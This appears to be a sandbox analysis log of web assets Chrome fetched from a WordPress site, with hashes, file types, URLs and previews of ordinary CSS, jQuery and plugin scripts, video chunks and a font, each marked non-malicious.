        Preview:.".H......h..H ..@],..G{...:...<)..&...+3..=.o.xP......?._.+.s...zT.#.Sb...+.qH..>g.......{...E..."w..`fh.zq=d..V.:%.]M.t...!.&..s.d..d;D<....../...a!...I..Ym..z.O-.N..*...cBB.2{r.S6*.....e.3s..:.O.v9.n....Q....f...Wf...9.T.p.Sh.....yB.._.....j9|.F..D..L..5.0............R....N.]v7%..t....c\R.......@'.....h....fch.Z...\OF..S.=.........$.6.$!...q...u. [........H/.7-g...o..U......i....(.{@...B.oJ.E0mI..2...#.f.,....@............X....~.....V....|...#.....H.ou7m.2Lx..X...}..7..:..$.h......aX...m.s.W..)s....@}...G'..r........#.."!...$..`B.dE.0........\......4.".E...!o..0.ufa.W..3{....D.[.#4.]U.I.v.m0.w...>.3Vk\Kl{^..3...'..T;...dr$z.....u...z...m-..C.|.C#.6..D.5..H.-..L.......[r._.5wv.Zp..".N.V.%a.@...6Lh.../Y.q9.U.A.G.!.*+..{.".,H.4#.........._.!.+.;.=.=.......t.....@Z>oUD..F.-.h..W...].J..S....J./`.+...S...(...5p.!..mo.&....)L.T..d.....U.q..1....J...R.......uU.V.m.=.P..r.#}.nll.w4#H.X.|X5... ;Y.[%...}........u....m;...X.......s..R...o...b
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (4186), with no line terminators
        Category:downloaded
        Size (bytes):4186
        Entropy (8bit):4.923675414240059
        Encrypted:false
        SSDEEP:
        MD5:EA958276B7DE454BD3C2873F0DC47E5F
        SHA1:B143F6E8E8F79D8F104C26B0057EF5514D763219
        SHA-256:2E10D353FF038C2CAD3492FC17801AF3E6EF2669C9E9713BDB78B1DCB104C4FE
        SHA-512:2D40A1E713355EFF88FA3BBF5471B4DB5ACC48FA2B978A555C034F2E5C7F131FCAF48E849D5D048DF9D5DAE068C4B6467A97B1DDE99115E6B32F57E928569FC1
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.6.2
        Preview:.mejs-container{clear:both;max-width:100%}.mejs-container *{font-family:Helvetica,Arial}.mejs-container,.mejs-container .mejs-controls,.mejs-embed,.mejs-embed body{background:#222}.mejs-time{font-weight:400;word-wrap:normal}.mejs-controls a.mejs-horizontal-volume-slider{display:table}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-time-rail .mejs-time-loaded{background:#fff}.mejs-controls .mejs-time-rail .mejs-time-current{background:#0073aa}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail .mejs-time-total{background:rgba(255,255,255,.33)}.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current,.mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-total,.mejs-controls .mejs-time-rail span{border-radius:0}.mejs-overlay-loading{background:0 0}.mejs-controls button:hover{border:none;-webkit-box-shadow:none;box-shadow:none}.me-cannotplay{width:au
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (304)
        Category:dropped
        Size (bytes):26563
        Entropy (8bit):5.15427768422978
        Encrypted:false
        SSDEEP:
        MD5:BEF800E8BEC94BC8B8313D2C8A06C2E6
        SHA1:B9527AFDE647793F96810D8EE67BB4EF32FC8FA6
        SHA-256:16FD14FEFCF35674A8803738DEFD2D132F2E04AD39D98C1AC442D7FB604505B4
        SHA-512:90E8AC7BF55F8D93E46C12A082A45086D7C3B93AFA4BE10A1520E5F1AF0D8332CB019350B3DA6E394E20E30AF3743900712802C18DAA3960EC922F0AF902896E
        Malicious:false
        Reputation:unknown
        Preview:jQuery(document).ready(function($){.....var adminBarHeight = 0;..if ( $("#wpadminbar").length != 0 ){...var adminBarHeight = $('#wpadminbar').height();..}..var mysticky_welcomebar_height = adminBarHeight + jQuery( '.mysticky-welcomebar-fixed' ).outerHeight();..if( jQuery( '.mysticky-welcomebar-fixed' ).data('position') == 'top' ) {...jQuery( '.mysticky-welcomebar-entry-effect-slide-in.mysticky-welcomebar-fixed' ).css( 'top', '-' + mysticky_welcomebar_height + 'px' );..} else {...jQuery( '.mysticky-welcomebar-entry-effect-slide-in.mysticky-welcomebar-fixed' ).css( 'bottom', '-' + mysticky_welcomebar_height + 'px' );..}..var divi_topbar_height = $( '.et_fixed_nav #top-header' ).outerHeight();..var divi_total_height = mysticky_welcomebar_height + divi_topbar_height;..var welcombar_aftersubmission = $( '.mysticky-welcomebar-fixed' ).data('aftersubmission');..if( welcombar_aftersubmission == 'dont_show_welcomebar' ){...var welcomebar_storage = localStorage.getItem("welcomebar_close");..} el
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (10597), with no line terminators
        Category:dropped
        Size (bytes):10597
        Entropy (8bit):5.180468200192552
        Encrypted:false
        SSDEEP:
        MD5:C75EB8FF9355BD4C0B5C5FB7918366F7
        SHA1:B28BE98410DB405A51A8D16F081660F41132A09B
        SHA-256:C1A45BD4089C90882E38C8DADBDDFCD4A881083827A5F49BC5B813E047451EDF
        SHA-512:1708A6500B8DE08C8FE54544686055272CE61179A01326D7494AB2131FFF08BDE3F0BE04909799B7EDBBE383672566FD53DE07A535380D78048662C875D68196
        Malicious:false
        Reputation:unknown
        Preview:!function(e){var t={};function n(r){if(t[r])return t[r].exports;var o=t[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var o in e)n.d(r,o,function(t){return e[t]}.bind(null,o));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=101)}({101:function(e,t,n){"use strict";n.r(t);var r=function(e){return"string"!=typeof e||""
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.997072616607505
        Encrypted:true
        SSDEEP:
        MD5:7677A215F5E3DD8189B56DC903CDCB36
        SHA1:C2F79C9240BC37535BFF48FBFEA876C9126ADC64
        SHA-256:D61838913016B50B988C8A1C8B0ABB423AE78A89F7F02FE5CDCE93A861C572F4
        SHA-512:329311342ED708290F380C87E45C2DC7E9504F545AF521420BD76354A9A2487489270CBD260EF792A92AD7FA8FD382BE9DF6331DD131C9B6D39A7579670BC087
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:2
        Preview:irp.f.........'.pP.-."....{.9....R.....r%P.e....D...3.....:....:..9...-r.l.yR.0.+...'..K.Dv`.-..f......2. r..j.O..CX..V..U......f......f....e..R\VF....s.r..R.....<.V......x.:.&..s.j...(G.2V.[.j\|8i.1-}.%E.[]...Z..yR.TC7.....#...?.....)...(....S:..e....%..c*..OgVG.[....y;.U...aQy.RG..1..."}[........c.....m[......Zp.........2..wB{....x_Nl.|... .].L...?.......rc.g..}F.......4...W....#N.......<1?..@..1.._...O.D.u.pX.o..B~}...bQ.J..f>........II.>%..s.5g....z.e..jv....[.<...8.s!.E.....>i.....D..w..y......a.R......I P.\.....t....8<...oO..._;46..rL..u.:..<..Y.+....#.@...v4.3...7........x.......gDN.$..e.s.<.d.D"$P:..8......F-.V....c!j..&.n....?I1.v.......q...f.;..l.51.r...o..Y..$5.5../.U..F.5..<.&...o.f...hfFD..&..N..u....q..\F!.W...{..7..+.RXR.;5..^.....K...s....Y.2.?...t\...........mhV."+@........<..J..d2.*...Y....f..(,.).......d..b.d.....z....+1..x_...jAO....t....e#.f,s6.]\......%c.ew.:.FI.....0....K...q.]...w-.(.....2,...Z..X....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (30299), with no line terminators
        Category:downloaded
        Size (bytes):30299
        Entropy (8bit):4.712196414781506
        Encrypted:false
        SSDEEP:
        MD5:317FBC87772718EB181EC7FEBA35E148
        SHA1:E08708D82FBA6BDB5D2A6826CC5099662F7DAAB1
        SHA-256:12C3F7BC60C99D1B6B634D6CD16FBB0E26AE75DDDA15D7A6E5106CD5DAD83F14
        SHA-512:12F3E8E96F53D74B1A93F80D1B3F5174879B29588F74C1EAE3E67C6BFC76AFC0613D4392B3B46B488B5557BF1DCD1752B4FE27E26ACFBAC2B2F88BF8AED1796A
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=3.3.0
        Preview:@media (max-width:480px){.ekit-wid-con .hotspot-following-line-style .ekit-hotspot-horizontal-line{width:50px}.ekit-wid-con .ekit-location_inner{left:0;right:auto}}@media (max-width:767px){.ekit-wid-con .elementskit-image-accordion-wraper{-ms-flex-wrap:wrap;flex-wrap:wrap}}@media screen and (min-width:1025px){.ekit-image-accordion-vertical .ekit-image-accordion{-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.ekit-image-accordion-vertical .ekit-image-accordion-item{min-height:0!important}}@media screen and (min-width:768px) and (max-width:1024px){.ekit-image-accordion-tablet-vertical .ekit-image-accordion,.ekit-image-accordion-vertical:not(.ekit-image-accordion-tablet-horizontal) .ekit-image-accordion{-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.ekit-image-accordion-tablet-vertical .ekit-image-accordion-item,.ekit-image-accordion-vertical:not(.ekit-image-accordion-table
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (60665)
        Category:downloaded
        Size (bytes):60705
        Entropy (8bit):4.738472584371312
        Encrypted:false
        SSDEEP:
        MD5:BB4DF2962ED7256E764841091C35F68E
        SHA1:6FDD4DA55D003D4FE106063A114D7DC59FCE9F67
        SHA-256:814EE9624F71954EEF0BA62BF1DFDDC9799626DEBC743955C61F862A01C133E7
        SHA-512:DC2A001736718BC6C620CA475981ABD4679C5B54A85E23F830D989DFB87F2A15191D9C4D8D0EED02B0C14633DABAF1B5B5E4ACE0808F1D4CAFAE9F0F8BBB31A9
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.24.7
        Preview:/*! elementor - v3.24.0 - 15-10-2024 */..elementor-hidden{display:none}.elementor-visibility-hidden{visibility:hidden}.elementor-screen-only,.screen-reader-text,.screen-reader-text span,.ui-helper-hidden-accessible{position:absolute;top:-10000em;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.elementor-clearfix:after{content:"";display:block;clear:both;width:0;height:0}.e-logo-wrapper{background:var(--e-a-bg-logo);display:inline-block;padding:.75em;border-radius:50%;line-height:1}.e-logo-wrapper i{color:var(--e-a-color-logo);font-size:1em}.elementor *,.elementor :after,.elementor :before{box-sizing:border-box}.elementor a{box-shadow:none;text-decoration:none}.elementor hr{margin:0;background-color:transparent}.elementor img{height:auto;max-width:100%;border:none;border-radius:0;box-shadow:none}.elementor .elementor-widget:not(.elementor-widget-text-editor):not(.elementor-widget-theme-post-content) figure{margin:0}.elementor embed,.elementor ifram
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (12885)
        Category:downloaded
        Size (bytes):12886
        Entropy (8bit):4.716886911413203
        Encrypted:false
        SSDEEP:
        MD5:0793CA35F5D388181A5E6C01688AF110
        SHA1:497222A5F1C49DAC626016019CA769AC1E3E39DC
        SHA-256:470B8FE4451DAB1FF2C7EDEEB3091A932188B7ACAA06D7E7187F9DD90947A553
        SHA-512:928C9376D7387ED5B7C4E8F8D65EDA6BE43436911E7FBBCBCAF936F6A9720BD6063C7F3D207031906F91BFC8226B099CFFBE39BED3DB77C510B43771550475F2
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/includes/Dependencies/GoDaddy/Styles/build/latest.css?ver=2.0.2
        Preview:#wpadminbar>.godaddy-styles *,.godaddy-styles *{font-family:GD Sherpa,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:1.4}#wpadminbar>.godaddy-styles .is-bigger,.godaddy-styles .is-bigger{font-size:1.1em!important;font-weight:500!important}#wpadminbar>.godaddy-styles .components-button,#wpadminbar>.godaddy-styles.components-button,.godaddy-styles .components-button,.godaddy-styles.components-button{border:0;border-radius:6px;box-shadow:none;font-size:1em;height:auto;line-height:1;padding:1.25em;transition:background-color,color,.2s ease-in-out}#wpadminbar>.godaddy-styles .components-button:disabled,#wpadminbar>.godaddy-styles.components-button:disabled,.godaddy-styles .components-button:disabled,.godaddy-styles.components-button:disabled{opacity:.5}#wpadminbar>.godaddy-styles .components-button>svg,#wpadminbar>.godaddy-styles.components-button>svg,.godaddy-styles .components-button>svg,.godaddy-styles.components-button
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (407), with no line terminators
        Category:downloaded
        Size (bytes):407
        Entropy (8bit):4.813540558248109
        Encrypted:false
        SSDEEP:
        MD5:23443F3486906CC9BC9AFB0133DDC022
        SHA1:C9C1E6BFB1B5F2C0DC7BF11964BE3F1C4733E272
        SHA-256:2F167AE1780938FA19464993733924D0D078D5F5CE7955A596A55C210CB36CC8
        SHA-512:A361B959A538790E9CA30F136483A3A8ABC1A4D4EDFAA96AE94E29535FF67892F79287654827BE43BBF405E3D4592BA0E27EE8E96B12FC856F8EF86AE8657AC4
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/js/coblocks-animation.js?ver=3.1.13
        Preview:(()=>{const e=document.querySelectorAll(".coblocks-animate");if("IntersectionObserver"in window){const t=new IntersectionObserver((e=>{e.forEach((e=>{e.isIntersecting&&(e.target.classList.add(e.target.dataset.coblocksAnimation),t.unobserve(e.target))}))}),{threshold:[.15]});e.forEach((e=>{t.observe(e)}))}else e.forEach((e=>{e.classList.remove("coblocks-animate"),delete e.dataset.coblocksAnimation}))})();
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (6194)
        Category:dropped
        Size (bytes):6464
        Entropy (8bit):5.237796564656252
        Encrypted:false
        SSDEEP:
        MD5:170687433986A4A559FA4F16B1D7C70E
        SHA1:84349B5FB0FCB057AE1768667F480FD607A1DA49
        SHA-256:722A90D42EF2BD0EA38F0FDAC6B4C0523AA4A027E9FFE889972100746E165582
        SHA-512:56A266D6ABC2690A87954AF3BC88B15C0FA08C3A8E9047741E8B18FD4179FBC107573BF19C242341BD5A7F7955DB1C6394A2E9240332BFCCA1785B47ADB6CEE2
        Malicious:false
        Reputation:unknown
        Preview:/*!. * MediaElement.js. * http://www.mediaelementjs.com/. *. * Wrapper that mimics native HTML5 MediaElement (audio and video). * using a variety of technologies (pure JavaScript, Flash, iframe). *. * Copyright 2010-2017, John Dyer (http://j.hn/). * License: MIT. *. */.!function a(o,s,u){function c(n,e){if(!s[n]){if(!o[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(l)return l(n,!0);var r=new Error("Cannot find module '"+n+"'");throw r.code="MODULE_NOT_FOUND",r}var i=s[n]={exports:{}};o[n][0].call(i.exports,function(e){var t=o[n][1][e];return c(t||e)},i,i.exports,a,o,s,u)}return s[n].exports}for(var l="function"==typeof require&&require,e=0;e<u.length;e++)c(u[e]);return c}({1:[function(e,t,n){"use strict";var T={promise:null,load:function(e){"undefined"!=typeof Vimeo?T._createPlayer(e):(T.promise=T.promise||mejs.Utils.loadScript("https://player.vimeo.com/api/player.js"),T.promise.then(function(){T._createPlayer(e)}))},_createPlayer:function(e){var t=new Vimeo.P
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (10502), with no line terminators
        Category:downloaded
        Size (bytes):10502
        Entropy (8bit):5.222995104157287
        Encrypted:false
        SSDEEP:
        MD5:39665EE2DC57BEF3021CF6BABD84A7C6
        SHA1:00736D8F687F526211095A9C1D29617D2DFBF012
        SHA-256:D1C63396C6FB5D907ED689C0BDA392011D3F177A7B599363C76BD323CD956F22
        SHA-512:E2C1ADA84B8442A5F8A7B430F8A164C88FE238A547753DB19F21B02C1A072A2866C511E3F70E84521BCB91CB2C0A3633A1C4DB3271396BB16AA55D83F7B76032
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/js/vendors/tiny-swiper.js?ver=3.1.13
        Preview:(()=>{var e={2590:function(e){e.exports=function(){"use strict";function e(){return e=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e},e.apply(this,arguments)}function t(e,t){void 0===t&&(t=[]),Array.isArray(t)||(t=[t]),t.forEach((function(t){return!e.classList.contains(t)&&e.classList.add(t)}))}function n(e,t,n,i){e.addEventListener(t,n,i)}function i(e,t,n){e.removeEventListener(t,n)}function r(e,t,n){return void 0===n&&(n=""),e.setAttribute(t,n),e}function o(e,t,n){return Object.keys(t).forEach((function(n){e.style[n]=t[n]})),n&&getComputedStyle(e),e}var a={direction:"horizontal",touchRatio:1,touchAngle:45,longSwipesRatio:.5,initialSlide:0,loop:!1,freeMode:!1,passiveListeners:!0,resistance:!0,resistanceRatio:.85,speed:300,longSwipesMs:300,spaceBetween:0,slidesPerView:1,centeredSlides:!1,slidePrevClass:"swiper-slide-prev",slideNextClass:"swiper-slide-next",slideActiveClass:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):40
        Entropy (8bit):4.184183719779189
        Encrypted:false
        SSDEEP:
        MD5:94D041D462DB321CDB888066586F2068
        SHA1:717D2F9DA7FB9F9E2BF2058A8177A0344F8A8647
        SHA-256:B8166C5475DF6A64AB2456E95F64564164ED697D258E8BFED8CEBCA40EFD6FA5
        SHA-512:9A320FBC1DBEDA1700F54140F814A285D1CDADF947F927DB7E1D70A686D15FC74D69530BD13AB7CF9C3A2009791F2AC8F358CD9F748B1C2995EB9712B68DC574
        Malicious:false
        Reputation:unknown
        Preview:jQuery(document).ready((function(e){}));
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:downloaded
        Size (bytes):16
        Entropy (8bit):3.75
        Encrypted:false
        SSDEEP:
        MD5:FA9C17CE126A76733ACA269345EB7D47
        SHA1:F1D8AA71F281509D55041F671B1A7BD94524AAD8
        SHA-256:15F88A501BBE49A103551BA087FE6FC7E101894E71C3A74A42E8EFC07DCEC0D8
        SHA-512:DD2E08D8D294E24330DDACFCC602D5AB9C9BD65346E0C6540F599725AB711E1F1621D3939318BFC069E67CEF889B80E781DA3E935D61C26E2086DAC79428818C
        Malicious:false
        Reputation:unknown
        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmeVM82NS6uUhIFDRM0Cs4=?alt=proto
        Preview:CgkKBw0TNArOGgA=
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (4216)
        Category:downloaded
        Size (bytes):4217
        Entropy (8bit):4.59404081392916
        Encrypted:false
        SSDEEP:
        MD5:1E3957B43F121FF7133A9D8F8E496050
        SHA1:2CA43E2F46AAE66FDC3D79AEA10CF1657808895B
        SHA-256:DC911E50400C81571608026BFC2251BBC8DF7A887E9B9BF7A6C23BCB2EF4346D
        SHA-512:E163D704E9E99F33DBE9BCD7187DC41345C74082452BF438653C623CBBBB8FB4DD8D51EC7E83080325F682032D96DE4B755410DF191B747850DCBCF1ADF90589
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/themes/go/dist/css/design-styles/style-traditional.min.css?ver=1.8.11
        Preview::root{--go--max-width:42rem;--go--max-width--alignwide:84rem;--go--viewport-basis:1000;--go--spacing--horizontal:60;--go--spacing--paragraph:9;--go--spacing--header:30;--go--color--text:#434a56;--go--font-family:"Nunito Sans",sans-serif;--go--font-size--small:85%;--go--font-size--smallest:82%;--go--font-size:1.05rem;--go--letter-spacing--small:0.015em;--go--line-height:1.85;--go--type-ratio:1.275;--go-heading--button-spacing:1.75rem;--go-heading--color--text:var(--go--color--secondary);--go-heading--font-family:"Crimson Text",serif;--go-heading--font-weight:400;--go-heading--letter-spacing:-0.02em;--go-heading--line-height:1.15;--go-heading--margin-bottom:2rem;--go-caption--color--text:#6e6e6e;--go-caption--font-size:0.85rem;--go-caption--text-align--rtl:right;--go-caption--text-align:left;--go-quote--border-width:0.45rem;--go-quote-large--font-size:2.5em;--go-pullquote--font-family:serif;--go-pullquote--font-style:normal;--go-outline--color--text:var(--go-heading--color--text);--go-se
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):933093
        Entropy (8bit):1.501990830427593
        Encrypted:false
        SSDEEP:
        MD5:F648BADDE7A052D4B6224D7B88F7E61D
        SHA1:316F4BCC2A5D4B51EF2F3DA6DA957E57A3F2396C
        SHA-256:5E2C5DB6A0396223D0F7EAC8AE2A87F5515756AD66A8995F547345B631807D82
        SHA-512:7557CE06231D890DD1867304B7829981091273F1A6E51B1A10B978119D325BF342A148EFCF19B66223085DA429185691985C6F788602E1650A0918008E7066CD
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:1e
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (3975)
        Category:downloaded
        Size (bytes):3976
        Entropy (8bit):4.928855538084132
        Encrypted:false
        SSDEEP:
        MD5:9D3CBD837C82A0DFDB39DF2BEE08AE48
        SHA1:754B95B7D0F79FE9352BCFA58F422E6196FCD8F6
        SHA-256:2C3299C727C34892CD1446214CFA9E31C8B9F5E7265CA254BABA5FCB88EE5C01
        SHA-512:60EA78BE95EA016A1830B4EE82742F60C2AB0E206FFDA55C99134CE11ED3A0C3E1593FD5F119F4DD2376665E15B382DA09BBBF231368C76DC4EB071EBAEF3B7A
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/plugins/coblocks/dist/style-coblocks-animation.css?ver=2677611078ee87eb3b1c
        Preview:.components-coblocks-animation-toggle.has-animation{position:relative}.components-coblocks-animation-toggle.has-animation :after{border-color:#0000 #1e1e1e #1e1e1e #0000;border-style:solid;border-width:4px;content:"";display:block;height:8px;position:absolute;right:0;top:1px;transform:rotate(-90deg);width:8px}.components-coblocks-animation-toggle .components-button:not(:hover) .coblocks-icon-animation .medium-circle{fill:#727272}.components-coblocks-animation-toggle .components-button:not(:hover) .coblocks-icon-animation .small-circle{fill:#c6c6c6}.components-coblocks-animation-toggle .components-button:hover .coblocks-icon-animation .large-circle,.components-coblocks-animation-toggle .components-button[aria-expanded=true] .coblocks-icon-animation .large-circle{animation:bounce .3s ease-in;animation-fill-mode:forwards}.components-coblocks-animation-toggle .components-button:hover .coblocks-icon-animation .medium-circle,.components-coblocks-animation-toggle .components-button[aria-expan
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text
        Category:dropped
        Size (bytes):22033
        Entropy (8bit):3.936488038605268
        Encrypted:false
        SSDEEP:
        MD5:E0B9184D7FD06F064B696F97CD23F287
        SHA1:83950264CBA8D04763D7D5CE82AE777DAFB01596
        SHA-256:3A1E33D6363A413140AD6ADC33EFF9829CCE21B3BC1017243B96DB942F9720DE
        SHA-512:A50DB2306726297412E09D1573BFFB5A62FDB89959F831695E7E04BF8DF74CEE364282F48AF72C033F9BF670A58C454567BD4B439D75B3BA146D6F21D337012A
        Malicious:false
        Reputation:unknown
        Preview:'use strict';..jQuery(document).ready(function($) {.. // Error checking. if (!$ || typeof $ === 'undefined') {. return console.log(. '[ModalWindow] No jQuery library detected. Load ModalWindow after jQuery has been loaded on the page.');. }.. $.fn.ModalWindow = function (options) {.. const _default = {. overlay: true, // [Enabled, Background]. blockPage: true,. action: ['load', 0], // [Action, Delay]. scrolled: [0, 'px'], // [Distance, Unit]. animation: ['no', 400, 'no', 400], // [animationIn, speedIn, animationOut, speedOut]. closeBtn: [false, 0], // [Remove, Delay]. autoClose: [false, 5], // [Enable, Time]. closeAction: [false, false], // [Overlay, Esc]. video: [false, false, false], // [Enable, AutoPlay, StopOnClose]. screenMax: [false, 1024], // [Enable, Screen]. screenMin: [false, 480], // [Enable, Screen]. mobile:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):950272
        Entropy (8bit):7.997358739933577
        Encrypted:true
        SSDEEP:
        MD5:26503F7ECFBA565A4B3A27683AA54D7E
        SHA1:E7AC7F9B4E00C256F3720453A98D740BDBA0CA3F
        SHA-256:E73A176587842BDDCB3BACDABB9EC3A4926D9EA990D18F64AE0DB80E1115DEFB
        SHA-512:4857090E351904C17CFE01C8BECC67B2DB309648E62D87A287E44F6A2664C656FCA392CCEF98D5946A261BA27B6AC8D414ED8505F162FBC9B17E4F80D9DF9B2A
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-content/uploads/2020/11/demoreel.mp4?_=1:2f845ee6dada5c:5
        Preview:.L.4...p......(e... .OO....h... .........?......E._M......(.kyv...v........q....0...6yi.....%..... .....?..a^\..L.z....w>...G....eD.......q..z8.WA..^.... |...j..........[...s..:.>0....h...V..J...4...'}^\..u".71....2...H!.x.=@.....j8.,.....v.k...Yo.N...w..t#S3dA..).}..$F........O.)..}.a.....P.[<D...*..m..x..W.B....oO.Y6.e....>.Ii.w..._..;.t.sxn...n.E.bZ..<.,.....}.6..l~..^..Z...L$JT...g......]f...E.."V`....>K....jr.:5.R...&.z.9....{~R.&^ ..n6.M.m...W.1..6.......Q.`.-2B8^V.x....k.LD.$..w\...Xt.}.R...F.e<......i2.;_'..T.C!D#.\E'...'C...U...d'.h.L..1. ..t.../q.1;..h|H.<....Pt}.i.zC)oo..)$......S..0!.....#..k.2lp..x.yb?..b.l..._.J..."\._..>..W.N9`[.....x.......h...c.f\M>&.e.$.k[.f.?..1.....=..$.$/.?)..r./"ka.....E..k..9.Z.NJ..X..g..)*..E.L.......Hh.........:..3&....[.tF.K..K.....<%2.#....o.....!.A...N....9...........r............2N.Z.X.'kW...'O.M.n._.jEyS......h....%R.....Q.o^h P.-5l....]...<...h.p.C....(..u..m.pL@.aU....cY....i.s~.X..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (13479)
        Category:downloaded
        Size (bytes):13577
        Entropy (8bit):5.272065782731947
        Encrypted:false
        SSDEEP:
        MD5:9FFEB32E2D9EFBF8F70CAABDED242267
        SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
        SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
        SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
        Malicious:false
        Reputation:unknown
        URL:https://studiomvs.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Web Open Font Format (Version 2), TrueType, length 33092, version 1.0
        Category:downloaded
        Size (bytes):33092
        Entropy (8bit):7.993894754675653
        Encrypted:true
        SSDEEP:
        MD5:057478083C1D55EA0C2182B24F6DD72F
        SHA1:CAF557CD276A76992084EFC4C8857B66791A6B7F
        SHA-256:BB2F90081933C0F2475883CA2C5CFEE94E96D7314A09433FFFC42E37F4CFFD3B
        SHA-512:98FF4416DB333E5A5A8F8F299C393DD1A50F574A2C1C601A0724A8EA7FB652F6EC0BA2267390327185EBEA55F5C5049AB486D88B4C5FC1585A6A975238507A15
        Malicious:false
